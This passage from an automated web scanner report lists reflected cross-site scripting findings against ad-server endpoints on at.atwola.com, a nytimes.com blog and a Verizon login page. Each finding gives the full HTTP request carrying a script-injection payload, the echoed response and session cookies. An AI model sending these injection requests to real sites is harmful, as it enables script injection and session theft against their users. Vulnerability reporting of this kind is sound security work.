Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a40"><script>alert(1)</script>c2bc805a2e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250?71a40"><script>alert(1)</script>c2bc805a2e1=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?71a40"><script>alert(1)</script>c2bc805a2e1=1;adiframe=y">
...[SNIP]...

2.178. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cb87"><script>alert(1)</script>7aeca9e2ce9 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=1cb87"><script>alert(1)</script>7aeca9e2ce9 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 245

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=1cb87"><script>alert(1)</script>7aeca9e2ce9;adiframe=y">
...[SNIP]...

2.179. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc842"><script>alert(1)</script>c6c404c7f34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframebc842"><script>alert(1)</script>c6c404c7f34/3.0/5113.1/221794/0/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addynbc842"><script>alert(1)</script>c6c404c7f34/3.0/5113.1/221794/0/-1/size=300x360;adiframe=y">
...[SNIP]...

2.180. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0ba0"><script>alert(1)</script>2968ba13e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0e0ba0"><script>alert(1)</script>2968ba13e9/5113.1/221794/0/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 228

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0e0ba0"><script>alert(1)</script>2968ba13e9/5113.1/221794/0/-1/size=300x360;adiframe=y">
...[SNIP]...

2.181. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87e09"><script>alert(1)</script>f35ee6743db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.187e09"><script>alert(1)</script>f35ee6743db/221794/0/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.187e09"><script>alert(1)</script>f35ee6743db/221794/0/-1/size=300x360;adiframe=y">
...[SNIP]...

2.182. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9253c"><script>alert(1)</script>2ff6b8beab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/2217949253c"><script>alert(1)</script>2ff6b8beab/0/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 228

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/2217949253c"><script>alert(1)</script>2ff6b8beab/0/-1/size=300x360;adiframe=y">
...[SNIP]...

2.183. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ee4"><script>alert(1)</script>5dbd143813e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/021ee4"><script>alert(1)</script>5dbd143813e/-1/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/021ee4"><script>alert(1)</script>5dbd143813e/-1/size=300x360;adiframe=y">
...[SNIP]...

2.184. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf01e"><script>alert(1)</script>606359cf405 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1bf01e"><script>alert(1)</script>606359cf405/size=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1bf01e"><script>alert(1)</script>606359cf405/size=300x360;adiframe=y">
...[SNIP]...

2.185. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5cc9"><script>alert(1)</script>d4da9e8e16c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/sized5cc9"><script>alert(1)</script>d4da9e8e16c=300x360 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 229

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/sized5cc9"><script>alert(1)</script>d4da9e8e16c=300x360;adiframe=y">
...[SNIP]...

2.186. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7be8"><script>alert(1)</script>81537d575e4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x360?d7be8"><script>alert(1)</script>81537d575e4=1 HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4CE45E846E651A454F57E65AF00070C8; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk6NjAxODU=; Axxd=1; CfP=1; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; AxData=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x360?d7be8"><script>alert(1)</script>81537d575e4=1;adiframe=y">
...[SNIP]...

2.187. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x360 [noperf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x360

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c6d8"><script>alert(1)</script>714077859e3 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x360;noperf=1;alias=93309328;cfp=1;noaddonpl=y;kvpg=gnn%2F;kvmn=93309328;target=_blank;aduho=360;grp=207022603;misc=2070226033c6d8"><script>alert(1)</script>714077859e3 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.gnn.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: at.atwola.com
Proxy-Connection: Keep-Alive
Cookie: Axxd=1; AxData=1#50085; CfP=1; JEB2=4CE45E846E651A454F57E65AF00070C8; ATTACID=a3Z0aWQ9MTZlOG9xZTAxY2c4ZGU=; ATTAC=a3ZzZWc9OTk5OTk6NTAwODU6NTQwNTc6NjA0OTA6NTAyMTI6NTAyMjA6NjAxODM6NTAyMTY6NTAyMjk=

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 352

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x360;noperf=1;alias=93309328;cfp=1;noaddonpl=y;kvpg=gnn%2F;kvmn=93309328;target=_blank;aduho=360;grp=207022603;misc=2070226033c6d8"><script>alert(1)</script>714077859e3;adiframe=y">
...[SNIP]...

2.188. http://atwar.blogs.nytimes.com/2010/11/19/recounting-war/ [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://atwar.blogs.nytimes.com
Path:   /2010/11/19/recounting-war/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe07"><script>alert(1)</script>ef0c8b9436d was submitted in the src parameter. This input was echoed as 2fe07\"><script>alert(1)</script>ef0c8b9436d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/19/recounting-war/?src=twr2fe07"><script>alert(1)</script>ef0c8b9436d HTTP/1.1
Host: atwar.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 03:43:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://atwar.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
6,Feature1,Spon3,ADX_CLIENTSIDE,SponLink2&query=qstring&keywords=Iraq+War;Afghanistan+War;Baghdad;Kandahar;Kabul;Pakistan;Swat+Valley;U.S.+military;troops;Taliban;Al+Qaeda;Shiite;Sunni+and+Kurd&src=twr2fe07\"><script>alert(1)</script>ef0c8b9436d">
...[SNIP]...

2.189. https://auth.verizon.com/amserver/UI/Login [goto parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the goto request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8af9a"%3b4024f132588 was submitted in the goto parameter. This input was echoed as 8af9a";4024f132588 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAW&clientId=myvz&goto=https%3A%2F%2Fwww22.verizon.com%3A443%2FForYourHome%2FMyAccount%2FProtected%2FServices%2FMyServices.aspx8af9a"%3b4024f132588 HTTP/1.1
Host: auth.verizon.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; vzAppID=; V347=CT-2; LOB_CATEGORY=; Product=A; ProductXML=A; vzpers=STATE=TX; vzapps=STATE=TX; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; BusinessUnit=business; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7200
Date: Sat, 20 Nov 2010 02:15:21 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDSCSBQTCB=EHCLJDFBFEEGFCIFCBIGJOAL; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66b45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:20:21 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 129007

<!-- Vignette V6 Fri Nov 19 18:15:20 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
   window.location.href="http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?goto=https://www22.verizon.com/ForYourHome/MyAccount/Protected/Services/MyServices.aspx8af9a";4024f132588";
}

function fnSetSessionCookie(name,value,path,domain){
   document.cookie=name+"="+escape(value)+((path)?";path="+path:"")+((domain)?";domain="+domain:"");
}
var strRemOpt="";
var strMyVzCom=f
...[SNIP]...

2.190. https://auth.verizon.com/amserver/UI/Login [module parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://auth.verizon.com
Path:   /amserver/UI/Login

Issue detail

The value of the module request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed15f"><script>alert(1)</script>14aed921693 was submitted in the module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /amserver/UI/Login?realm=dotcom&module=AIAWed15f"><script>alert(1)</script>14aed921693&clientId=myvzorl&goto= HTTP/1.1
Host: auth.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: vzapps=STATE=TX; JSESSIONID=8D8835B40A91EF6F7C2190E960B846C4; Product=A; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0W